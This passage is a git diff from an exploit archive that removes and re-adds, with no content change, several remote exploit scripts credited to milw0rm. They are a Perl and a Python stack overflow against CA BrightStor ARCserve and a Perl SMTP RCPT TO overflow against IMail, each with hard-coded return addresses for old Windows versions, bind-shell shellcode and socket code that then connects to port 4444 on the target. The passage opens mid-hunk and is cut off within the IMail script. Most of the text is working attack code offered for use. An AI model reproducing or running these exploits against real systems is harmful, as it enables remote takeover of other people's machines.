-case 4 { $uef="\xb4\x63\xed\x77" } # WinXP Pro English SP0 version -} - -switch ($ret) { -case 1 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll -case 2 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 Italian version CALL DWORD PTR DS:[ESI+48] in qclient.dll -case 3 { $ret="\x52\xbf\x04\x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll -case 4 { $ret="\xd7\xe9\xd0\x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll -} - - - - -my $shellcode = -"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0". 
-"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f". -"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf". -"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf". -"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf". -"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf". -"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef". -"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff". -"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa". -"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28". -"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79". -"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb". -"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42". -"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63". -"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d". -"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a". -"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07". -"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5". -"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b". -"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa". -"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75". -"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"; - - -my $uuid="\x05". #version -"\x00". #version minor -"\x0b". #packet bind -"\x03". #packet flag -"\x10\x00\x00\x00". #data rapresentation -"\x48\x00". #fragment length -"\x00\x00". #auth length -"\x01\x00\x00\x00". #call id -"\xd0\x16\xd0\x16". -"\x00\x00\x00\x00". #assoc group -"\x01\x00\x00\x00\x00\x00\x01\x00". -"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38". #uuid -"\x01\x00". #interface ver -"\x00\x00". #interface ver minor -"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60". 
#transfer syntax -"\x02\x00\x00\x00"; #syntax ver - -my $special="\x05". #version -"\x00". #version minor -"\x00". #packet type request -"\x03". #packet flags -"\x10\x00\x00\x00". #data rapresentation -"\x18\x08". #frag length -"\x00\x00". #auth length -"\x01\x00\x00\x00". #call id -"\x00\x08\x00\x00". #alloc hint -"\x00\x00". #contex id -"\x2b\x00"; #opnum 43 - - - - -my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); -$socket or die "Cannot connect to host!\n"; - - -$request = $uuid; -send $socket, $request, 0; -print "[+] Sent uuid request\n"; -recv($socket, $reply, 1024, 0); - - -$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n"; -send $socket, $request, 0; -print "[+] Sent malicius 1st request\n"; - - -$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n"; -send $socket, $request, 0; -print "[+] Sent malicius 2nd request\n"; - - - -print " + Connect on 4444 port of $host ...\n"; -sleep(3); -system("telnet $host 4444"); -exit; - -# milw0rm.com [2007-01-28] +#!/usr/bin/perl +# +# original exploit by lssec.com this is a perl porting +# +# acaro [at] jervus.it + + +use IO::Socket::INET; +use Switch; + +if (@ARGV < 3) { +print "--------------------------------------------------------------------\n"; +print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n"; +print " Return address: \n"; +print " 1 - Windows 2k Sp4 English Version\n"; +print " 2 - Windows 2k Sp4 Italian Version\n"; +print " 3 - Windows XP Pro Sp1 English Version\n"; +print " 4 - Windows XP Pro Sp0 English Version\n"; +print " If values not specified, Windows 2k Sp4 will be used.\n"; +print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1\n"; +print "--------------------------------------------------------------------\n"; +} + +use IO::Socket::INET; + +my $host = 10.0.0.2; +my $port = 6503; +my $reply; +my $request; +my $jmp="\xeb\x0a\x90\x90"; # JMP 
over ret and uef to our shellcode + + + + +foreach (@ARGV) { +$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); +$uef = $1 if ($_=~/-o(.*)/); +$ret = $1 if ($_=~/-o(.*)/); +} + + + + +switch ($uef) { +case 1 { $uef="\x4c\x14\x54\x7c" } # Win2k SP4 English version +case 2 { $uef="\x4c\x14\x68\x79" } # Win2k SP4 Italian version +case 3 { $uef="\xb4\x73\xed\x77" } # WinXP Pro English SP1 version +case 4 { $uef="\xb4\x63\xed\x77" } # WinXP Pro English SP0 version +} + +switch ($ret) { +case 1 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll +case 2 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 Italian version CALL DWORD PTR DS:[ESI+48] in qclient.dll +case 3 { $ret="\x52\xbf\x04\x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll +case 4 { $ret="\xd7\xe9\xd0\x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll +} + + + + +my $shellcode = +"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0". +"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f". +"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf". +"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf". +"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf". +"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf". +"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef". +"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff". +"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa". +"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28". +"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79". +"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb". +"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42". +"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63". +"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d". 
+"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a". +"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07". +"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5". +"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b". +"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa". +"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75". +"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"; + + +my $uuid="\x05". #version +"\x00". #version minor +"\x0b". #packet bind +"\x03". #packet flag +"\x10\x00\x00\x00". #data rapresentation +"\x48\x00". #fragment length +"\x00\x00". #auth length +"\x01\x00\x00\x00". #call id +"\xd0\x16\xd0\x16". +"\x00\x00\x00\x00". #assoc group +"\x01\x00\x00\x00\x00\x00\x01\x00". +"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38". #uuid +"\x01\x00". #interface ver +"\x00\x00". #interface ver minor +"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60". #transfer syntax +"\x02\x00\x00\x00"; #syntax ver + +my $special="\x05". #version +"\x00". #version minor +"\x00". #packet type request +"\x03". #packet flags +"\x10\x00\x00\x00". #data rapresentation +"\x18\x08". #frag length +"\x00\x00". #auth length +"\x01\x00\x00\x00". #call id +"\x00\x08\x00\x00". #alloc hint +"\x00\x00". 
#contex id +"\x2b\x00"; #opnum 43 + + + + +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); +$socket or die "Cannot connect to host!\n"; + + +$request = $uuid; +send $socket, $request, 0; +print "[+] Sent uuid request\n"; +recv($socket, $reply, 1024, 0); + + +$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n"; +send $socket, $request, 0; +print "[+] Sent malicius 1st request\n"; + + +$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n"; +send $socket, $request, 0; +print "[+] Sent malicius 2nd request\n"; + + + +print " + Connect on 4444 port of $host ...\n"; +sleep(3); +system("telnet $host 4444"); +exit; + +# milw0rm.com [2007-01-28] diff --git a/platforms/windows/remote/3244.py b/platforms/windows/remote/3244.py index 1acb6dc06..c29f4f85c 100755 --- a/platforms/windows/remote/3244.py +++ b/platforms/windows/remote/3244.py 
@@ -1,93 +1,93 @@ -#!/usr/bin/python -# Remote exploit for the CA BrightStor Arcserve stack overflow as -# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded -# -# -# Winny Thomas ;-) -# Author shall bear no responsibility for any screw ups caused by using this code -# - -import os -import sys -import socket -import struct - -#Portbind shellcode; Binds shell on TCP port 4444 -shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += 
"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += 
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90" - -def ExploitCA(target): - sockAddr = (target, 1900) - tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - tsock.connect(sockAddr) - - payload = str('0000033000') - payload += "\x90" * 2322 - - #At the time of overflow EBX points to this location - payload += "\x90\x90\xeb\x08" #Jump over return address into shellcode - payload += struct.pack("' % sys.argv[0] - sys.exit(-1) - - ExploitCA(target) - ConnectShell(target) - -# milw0rm.com [2007-02-01] +#!/usr/bin/python +# Remote exploit for the CA BrightStor Arcserve stack overflow as +# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded +# +# +# Winny Thomas ;-) +# Author shall bear no responsibility for any screw ups caused by using this code +# + +import os +import sys +import socket +import struct + +#Portbind shellcode; Binds shell on TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += 
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" +shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" +shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" +shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" +shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" +shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" +shellcode += 
"\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" +shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" +shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" +shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a\x90" + +def ExploitCA(target): + sockAddr = (target, 1900) + tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + tsock.connect(sockAddr) + + payload = str('0000033000') + payload += "\x90" * 2322 + + #At the time of overflow EBX points to this location + payload += "\x90\x90\xeb\x08" #Jump over return address into shellcode + payload += struct.pack("' % sys.argv[0] + sys.exit(-1) + + ExploitCA(target) + ConnectShell(target) + +# milw0rm.com [2007-02-01] diff --git a/platforms/windows/remote/3264.pl b/platforms/windows/remote/3264.pl index f3146ab8b..cc8fd449f 100755 --- a/platforms/windows/remote/3264.pl +++ b/platforms/windows/remote/3264.pl 
@@ -1,109 +1,109 @@ -#!/usr/bin/perl -# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html -# http://www.securityfocus.com/bid/19885 -# -# acaro [at] jervus.it - - -use IO::Socket::INET; -use Switch; - -if (@ARGV < 3) { -print "--------------------------------------------------------------------\n"; -print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n"; -print " Return address: \n"; -print " o1 - IMail 8.12 Version\n"; -print " o2 - IMail 8.10 Versio\n"; -print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n"; -print "--------------------------------------------------------------------\n"; -} - -use IO::Socket::INET; - -my $host = 10.0.0.2; -my $port = 25; -my $reply; -my $request; -my $happystack="\x81\xc4\xff\xef\xff\xff\x44"; - - - -foreach (@ARGV) { -$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); -$eip = $1 if ($_=~/-o(.*)/); -} - -switch ($eip) { -case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12 -case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10 -} - - - -# win32_bind - EXITFUNC=seh LPORT=4444 - -my $shellcode = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93". -"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9". -"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd". -"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf". -"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e". -"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd". -"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd". -"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66". -"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6". -"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34". -"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65". -"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7". 
-"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e". -"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f". -"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61". -"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66". -"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b". -"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9". -"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67". -"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6". -"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69". -"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; - - -my $nop="\x41"x137; - -my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n"; - - -my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); -$socket or die "Cannot connect to host!\n"; - -recv($socket, $reply, 1024, 0); -print "Response:" . $reply; - - -$request = "EHLO " . "\r\n"; -send $socket, $request, 0; -print "[+] Sent EHLO\n"; -recv($socket, $reply, 1024, 0); -print "Response:" . $reply; - - -$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; -send $socket, $request, 0; -print "[+] Sent MAIL FROM\n"; -recv($socket, $reply, 1024, 0); -print "Response:" . 
$reply; - - - - -$request = $buffer; -send $socket, $request, 0; -print "[+] Sent malicius request\n"; -close $socket; - - - -print " + connect on port 4444 of $host ...\n"; -sleep(3); -system("telnet $host 4444"); -exit; - -# milw0rm.com [2007-02-04] +#!/usr/bin/perl +# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html +# http://www.securityfocus.com/bid/19885 +# +# acaro [at] jervus.it + + +use IO::Socket::INET; +use Switch; + +if (@ARGV < 3) { +print "--------------------------------------------------------------------\n"; +print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n"; +print " Return address: \n"; +print " o1 - IMail 8.12 Version\n"; +print " o2 - IMail 8.10 